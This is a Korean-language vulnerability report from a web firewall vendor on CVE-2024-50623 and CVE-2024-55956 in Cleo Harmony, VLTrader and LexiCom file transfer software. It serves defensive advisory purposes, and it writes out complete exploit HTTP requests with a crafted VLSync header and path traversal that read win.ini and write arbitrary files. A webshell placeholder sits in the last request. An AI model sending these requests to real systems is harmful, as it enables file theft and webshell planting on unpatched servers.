[2024년 12월 취약점 보고서] Cleo Harmony, VLTrader and LexiCom File Read/Write Vulnerability | Cloud-Based Platform AIONCLOUD

Threat Intelligence Report

Get up-to-date information on web application vulnerabilities, attacks, and how to respond.

Threat Intelligence Report 메인페이지로 돌아가기

[2024년 12월 취약점 보고서] Cleo Harmony, VLTrader and LexiCom File Read/Write Vulnerability

TA 팀이 “Cleo Harmony, VLTrader 및 LexiCom 파일 읽기/쓰기 취약점”을 분석하여 작성한 취약점 보고서

해당 취약점은 클레오에서 제공하는 소프트웨어의 파일 읽기/쓰기 취약점으로, 변조된 VLSync 헤더를 통해 해당 소프트웨어를 사용하여 서비스 내 악성 파일에 접근하거나 업로드하려고 시도하는 취약점입니다.

해당 취약점은 하모니, VLTrader, LexiCom 5.8.0.21 및 5.8.0.24에서 패치되었으며, AIWAF는 관련 취약점을 지속적으로 모니터링하고 있습니다.

1. 개요

Cleo는 관리형 파일 전송 솔루션을 제공하는 소프트웨어 회사로, Harmony, VLTrader and LexiCom와 같은 소프트웨어를 제공합니다. 이 Report에서는 해당 소프트웨어에서 발생한 파일 읽기 및 쓰기 취약점인 CVE-2024-50623 및 CVE-2024-55956에 대해 분석한 내용을 정리하였습니다.

image.png

출처 : https://www.helpnetsecurity.com/2024/12/10/cve-2024-50623-cleo-file-transfer-software-vulnerabilities-exploited/

2. 공격 유형

CVE-2024-50623는 Cleo Harmony, VLTrader and LexiCom 소프트웨어에서 발생한 파일 읽기 및 쓰기 취약점으로, 해당 소프트웨어의 endpoint 중 파일 동기화를 처리하는 /Synchronization endpoint의 취약한 번호 검증 방식을 활용해 조작된 VLSync 헤더를 전송하여 임의 파일 데이터를 불러오거나, 악성 Webshell을 전송하여 임의 파일 쓰기가 가능합니다.

GET 요청을 활용해 win.ini 파일 읽기 :

GET /Synchronization HTTP/1.1
Host: www.test.com
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=1337;po=1337;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini
Content-Type: multipart/form-data; boundary=---------------------------12345678901234567890123456
Content-Length: 0

POST 요청을 활용해 test.txt 파일 생성하기 :

POST /Synchronization HTTP/1.1
Host: www.test.com
VLSync: ADD;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=1337;po=1337;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\test.txt
Content-Type: multipart/form-data; boundary=-----1337
Content-Length: 14

cve-2024-50623

CVE-2024-55956은 CVE-2024-50623가 패치된 버전에서 발견된 파일 쓰기 취약점으로, VLSync: Multipart;l=0,Acknowledge 헤더가 포함된 요청을 보내어 악성 Webshell 내용을 임의 파일에 작성할 수 있습니다.

다만 해당 취약점은 CVE-2024-50623과는 다른 부분에서 발생한 취약점으로, 파일 쓰기만 가능하다는 점에서 차이를 보입니다.

POST 요청을 활용해 temp/hax.txt 파일 생성하기 :

POST /Synchronization HTTP/1.1
Host: 192.168.86.50:5080
Connection: close
Content-Type: application/form-data;boundary=--------boundary
VLSync: Multipart;l=0,Acknowledge
Content-Length: 119

VLSync: ReceivedReceipt;service="AS2";msgId=12345;path="temp/hax.txt";receiptfolder=Unspecified;
--------boundary
<Malware code>

3. 대응

CVE-2024-50623은 Harmony, VLTrader, LexiCom 5.8.0.21 패치를 통해 대응되었으며, CVE-2024-55956은 Harmony, VLTrader, LexiCom 5.8.0.24 패치를 통해 대응되었습니다.

해당 취약점의 경우 조작된 VLSync 헤더가 포함된 요청을 전송하는 방식의 취약점으로 보여져, 저희 AIWAF 제품에서는 추가 분석을 진행하여 패턴으로 대응할 예정입니다.

4. 결론

Cleo Harmony, VLTrader and LexiCom은 관리형 파일 전송(MFT) 솔루션을 지원하는 소프트웨어로, 여러 대기업에서 사용되고 있으며 해당 취약점이 랜섬웨어 공격에 적극적으로 활용되고 있다는 CISA의 경고가 있는 만큼, 해당 소프트웨어를 사용하는 고객 및 기업은 빠르게 최신 버전으로 업데이트가 필요합니다.

저희 AIWAF 제품에서는 Cleo사에서 제공하는 소프트웨어에서 발생하는 취약점들에 대해 지속적으로 모니터링하고 있으며, 앞으로도 발견되는 관련 취약점들에 대해서도 신속하게 대응할 예정입니다.

5. 참고

Copyright 2024 AIONCLOUD's All Right Reserved| 개인정보 처리 방침| 이용약관| Cookie Settings
Scroll Up